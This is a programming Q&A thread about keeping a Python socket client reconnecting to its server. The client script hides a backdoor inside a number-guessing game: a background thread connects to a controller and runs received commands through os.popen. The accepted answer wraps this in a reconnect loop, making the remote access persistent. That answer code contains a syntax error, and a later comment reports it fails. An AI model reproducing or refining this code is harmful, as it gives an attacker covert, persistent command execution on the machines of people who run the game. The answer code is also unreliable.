# How can I have client socket continue listening for server after a server is closed in python?

Tags: python, python-3.x, multithreading, sockets, port

This is my client.py:

```
import random
import socket
import threading
import os
from time import sleep


def access():
    HOST = '127.0.0.1'
    PORT = 22262

    client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    while True:
        try:
            client.connect((HOST, PORT))
            break
        except Exception:
            sleep(1)
    cmd_mode = False

    while True:
        command = client.recv(1024).decode('utf-8')
        if command == 'cmdon':
            cmd_mode = True
            client.send('You now have terminal access!'.encode('utf-8'))
            continue
        if command == 'cmdoff':
            cmd_mode = False
        if cmd_mode:
            os.popen(command)
        if command == 'hello':
            print('Hello World!')
        client.send(f'{command} was exectued successfully!'.encode('utf-8'))


def game():
    number = random.randint(0, 1000)
    tries = 1
    done = False

    while not done:
        guess = int(input('Enter a guess: '))

        if guess == number:
            done = True
            print('You won!')
        else:
            tries += 1
            if guess > number:
                print('The actual number is smaller.')
            else:
                print('The actual number is larger.')
        print(f'You need {tries} tries!')


t1 = threading.Thread(target=game)
t2 = threading.Thread(target=access)

t1.start()
t2.start()
```

This is the server.py

```
import socket

HOST = ''
PORT = 22262

server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.bind((HOST, PORT))

server.listen()

client, address = server.accept()

while True:
    print(f'Connected to {address}')
    cmd_input = input('Enter a command: ')
    client.send(cmd_input.encode('utf-8'))
    print(client.recv(1024).decode('utf-8'))
```

This works but if I disconnect server.py I get the following error on client.py:

```
ConnectionResetError: [WinError 10054] An existing connection was forcibly closed by the remote host
```

Is their a way to have client.py always listen and wait for server.py to come online so that they could connect back again? Basically I want client.py to never stop listening for server.py

Comment: Clients don't usually listen for servers. The server listens continuously, and clients connect to to it when they need something.

Comment: That's basically the difference between clients and servers.

Comment: The client should just keep trying to connect to the server. There's nothing built in to do this automatically. So just put the `connect()` call in a loop.

Comment: he wants to check if the server is online periodically, correct me if i am mistaken

Comment: error is due to the existing connections which get closed.

Comment: oh but can I somehow set it up to never shut down whenever a server fails? Like maybe adding a while loop with a ```try``` and ```exception``` error?

Comment: wait, i will just write the solution to it

Answer (score 0, accepted):

The problem described by you shows that the server closed the connection while your client was doing the task, so the simplest solution is wrap it up in a `try...except while_loop`

replace

```py
def access():
    HOST = '127.0.0.1'
    PORT = 22262


    while True:
        client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        try:
            client.connect((HOST, PORT))
            break
        except Exception:
            sleep(1)
    cmd_mode = False

    while True:
        command = client.recv(1024).decode('utf-8')
        if command == 'cmdon':
            cmd_mode = True
            client.send('You now have terminal access!'.encode('utf-8'))
            continue
        if command == 'cmdoff':
            cmd_mode = False
        if cmd_mode:
            os.popen(command)
        if command == 'hello':
            print('Hello World!')
        client.send(f'{command} was exectued successfully!'.encode('utf-8'))
```

with

```py
def access():
    HOST = '127.0.0.1'
    PORT = 22262

    while True
        client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        try:
            while True:
                try:
                    client.connect((HOST, PORT))
                    break
                except Exception:
                    sleep(1)
            cmd_mode = False
    
            while True:
                command = client.recv(1024).decode('utf-8')
                if command == 'cmdon':
                    cmd_mode = True
                    client.send('You now have terminal access!'.encode('utf-8'))
                    continue
                if command == 'cmdoff':
                    cmd_mode = False
                if cmd_mode:
                    os.popen(command)
                if command == 'hello':
                    print('Hello World!')
                client.send(f'{command} was exectued successfully!'.encode('utf-8'))
        except:
            pass
```

now the above code wraps it up using try and except with a while loop so it continues to try connecting to server even if the server goes down in between a connection

Comment: This did remove the error but it isn't connecting to the server.

Comment: please wait then

Comment: Same issue. The client isn't showing up on the server side

Comment: oh sorry, i mistakinly edited something i did not meant to, i will just edit again

Comment: retry it please